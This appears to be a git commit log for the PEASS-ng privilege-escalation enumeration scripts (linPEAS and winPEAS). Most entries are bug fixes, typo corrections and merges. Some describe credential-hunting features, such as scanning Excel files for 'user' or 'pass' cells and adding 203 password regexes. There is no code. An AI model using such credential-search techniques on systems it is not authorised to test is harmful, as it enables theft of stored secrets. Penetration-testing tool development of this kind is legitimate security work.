Carlos Polop	31aed5cd92	Merge pull request #397 from RandolphConley/master code update ; Added search / function for excel files	2023-10-24 12:34:02 +02:00
StevenLtheThird	11d93c42e7	Update winPEAS.ps1 Remove extra code in search for files.	2023-10-13 17:46:43 -04:00
StevenLtheThird	9f75cc824c	Merge branch 'master' of https://github.com/RandolphConley/PEASS-ng	2023-10-13 17:43:05 -04:00
StevenLtheThird	8caca65606	Update winPEAS.ps1	2023-10-13 17:42:51 -04:00
RandolphConley	3ee6ee0836	Merge branch 'carlospolop:master' into master	2023-10-13 17:39:54 -04:00
StevenLtheThird	e0b0ffcacc	code update ; Added search / function for excel files Function will read excel files looking for words: "user" or "pass" - in case those cells are populated for a credentials file.	2023-10-13 17:39:24 -04:00
Carlos Polop	9163062daa	Merge pull request #396 from RandolphConley/master logo color, updated output, added -fullcheck flag	2023-10-11 22:59:21 +02:00
StevenLtheThird	6d8db70b30	Merge branch 'master' of https://github.com/RandolphConley/PEASS-ng	2023-10-11 15:58:02 -04:00
StevenLtheThird	4ee91b897a	logo color, updated output, added -fullcheck flag Added colors to the logo, so winPEAS looks like it should. Updated the output to filter out erroneous information. Which leads to the -fullcheck flag. The flag adds all regex searches back into the script to check files/folders for data. However the regexes do return false positives, so use as a last resort.	2023-10-11 15:57:35 -04:00
Carlos Polop	05f6cb7b0a	Update 9_interesting_files.sh	2023-10-02 23:54:28 +02:00
Carlos Polop	5199c4c395	Update ProcessInfo.cs	2023-08-24 19:48:31 +02:00
Carlos Polop	f99387feed	Update linpeas_base.sh	2023-08-18 13:19:53 +02:00
Carlos Polop	7eac86c008	Merge pull request #387 from RandolphConley/master Updated switch parameter to TimeStamp	2023-08-17 22:00:57 +02:00
StevenLtheThird	cab71afe3a	update Parameter $TimeStamp	2023-08-17 15:18:59 -04:00
StevenLtheThird	822768ca1b	Add $debugTimeStamp parameter	2023-08-17 14:40:49 -04:00
Carlos Polop	84dc284fac	Merge pull request #382 from RandolphConley/master Feature add, bug fix	2023-08-08 07:41:42 +02:00
StevenLtheThird	101f477279	Merge branch 'master' of https://github.com/RandolphConley/PEASS-ng	2023-08-07 15:20:07 -04:00
StevenLtheThird	f296c89300	Feature Add, Bug fix Added 203 regex password options (from yaml regex search). Updated entry for %userprofile% to $env:UserName	2023-08-07 15:20:01 -04:00
Carlos Polop	eddc6726e0	Update 1_system_information.sh	2023-08-07 08:35:15 +02:00
Carlos Polop	ae37d8f24f	Merge pull request #380 from makikvues/fix-tests-and-logo Fixed logo, removed long-running checks from tests, create search lists only if necessary	2023-08-05 18:02:31 +02:00
makikvues	78d187db52	- fixed logo - updated tests, long-running checks are removed - create search lists only if necessary	2023-08-03 19:21:22 +02:00
Carlos Polop	0fe26134ea	Merge pull request #378 from Mateodevv/master Fixed Typo in Readme for linPEASS	2023-08-03 15:29:34 +02:00
RandolphConley	40c47868d2	Merge branch 'carlospolop:master' into master	2023-08-02 16:01:56 -04:00
StevenLtheThird	b617756f80	Update winPEAS.ps1 bug fix: replaced %username% with $env:usernames Introduced Regex search based on yaml file (integrated to script) Added -debug switch for timestamps	2023-08-02 15:57:21 -04:00
z004r19n	6c0d00f1cb	Fixed Typo	2023-08-01 09:48:37 +02:00
Carlos Polop	9861259bca	Merge pull request #375 from galoget/master Fix typos, grammar and spacing	2023-07-31 16:56:43 +02:00
Carlos Polop	0ab20b9524	Merge pull request #374 from jahatfi/master Wrap 'nosh_usrs' user names in word boundaries	2023-07-31 16:55:51 +02:00
Carlos Polop	33bba036ce	Update CI-master_tests.yml	2023-07-31 16:55:07 +02:00
Carlos Polop	89240fc7ea	Delete aicoder.yml	2023-07-31 16:32:13 +02:00
Carlos Polop	3ab9ab8101	Delete AIPRChecker.yml	2023-07-31 16:31:49 +02:00
Carlos Polop	d101acc85c	Merge pull request #377 from makikvues/fix-alphafs-leaked-handle Fixed AlphaFS dependency, fixed leaked handlers detection	2023-07-31 16:31:12 +02:00
makikvues	869145388d	- added progress bar while reading leaked handles	2023-07-30 17:38:57 +02:00
makikvues	bcd52764ba	- added alphaFS as 3rd party library - PrintVulnLeakedHandlers wrapped in try/catch - removed commented out code in SearchHelper.cs - added check for empty config in YamlConfigHelper	2023-07-30 11:01:20 +02:00
galoget	6525727ca9	Update peass.rb Fix typos, grammar and misspelled words.	2023-07-25 12:33:15 -05:00
galoget	41e2367be6	Update linpeas_builder.py Standardize spacing in comments.	2023-07-25 12:22:14 -05:00
galoget	5e41f694e2	Update linpeas_base.sh Standardize spacing in comments.	2023-07-25 12:21:36 -05:00
galoget	5e8def70d1	Update 9_interesting_files.sh Standardize spacing in comments	2023-07-25 12:16:03 -05:00
galoget	f441212026	Update 8_interesting_perms_files.sh Standardize spacing in comments	2023-07-25 12:13:37 -05:00
galoget	337f210bb9	Update 7_software_information.sh Fix typos and spacing	2023-07-25 12:11:09 -05:00
galoget	d63f11bc53	Update 3_cloud.sh (Typos) Fix typos, spacing and added comments.	2023-07-25 11:58:47 -05:00
galoget	210abd9329	Update 2_container.sh (Fix typo) Fix typo and spacing.	2023-07-25 11:48:55 -05:00
kali.kali	be912ad77e	Wrap 'nosh_usrs' user names in word boundaries to prevent false positives when such names are substrings of other strings	2023-07-24 20:06:47 -04:00
Carlos Polop	667bb5220d	Merge pull request #373 from galoget/master Fix Broken Links for Cloud and Containers Pentesting	2023-07-24 18:52:48 +02:00
galoget	44a3cce5c7	Update 2_container.sh (Fix broken links) Update script 2_container.sh to fix broken links to Kubernetes Pentesting.	2023-07-24 11:03:05 -05:00
galoget	965ca0868a	Update 3_cloud.sh (Fix broken link) Update script 3_cloud.sh to fix a broken link to GCP Pentesting.	2023-07-24 10:55:35 -05:00
carlospolop	1279434ba6	Merge branch 'aicoder' of https://github.com/carlospolop/PEASS-ng into aicoder	2023-07-24 10:23:18 +02:00
Carlos Polop	d60fed0f20	Merge pull request #370 from takitakitanana/master path contains spaces check	2023-07-23 01:51:43 +02:00
Carlos Polop	0a1a0d1e56	Merge pull request #371 from nillyr/linPEAS-builder-fix Fix linPEAS build	2023-07-23 01:50:01 +02:00
Nicolas GRELLETY	2bc6c94608	Merge remote-tracking branch 'origin/linPEAS-builder-fix' into linPEAS-builder-fix	2023-07-23 00:49:25 +02:00
Nicolas GRELLETY	509e164d6f	🐛 fix linPEAS build Update search regex due to API change	2023-07-23 00:49:04 +02:00
Nicolas GRELLETY	e7bfabe082	:fix: fix linPEAS builder Update search regex due to API change	2023-07-23 00:14:26 +02:00
takitakitanana	7c7b17a7cc	fixed typo	2023-07-22 03:58:37 +03:00
takitakitanana	2cb6af3f27	path contains spaces check	2023-07-22 03:27:08 +03:00
Carlos Polop	0d75c0085a	Create AIPRChecker.yml	2023-07-20 17:53:51 +02:00
Carlos Polop	bc064ddb88	Update README.md	2023-07-20 17:44:02 +02:00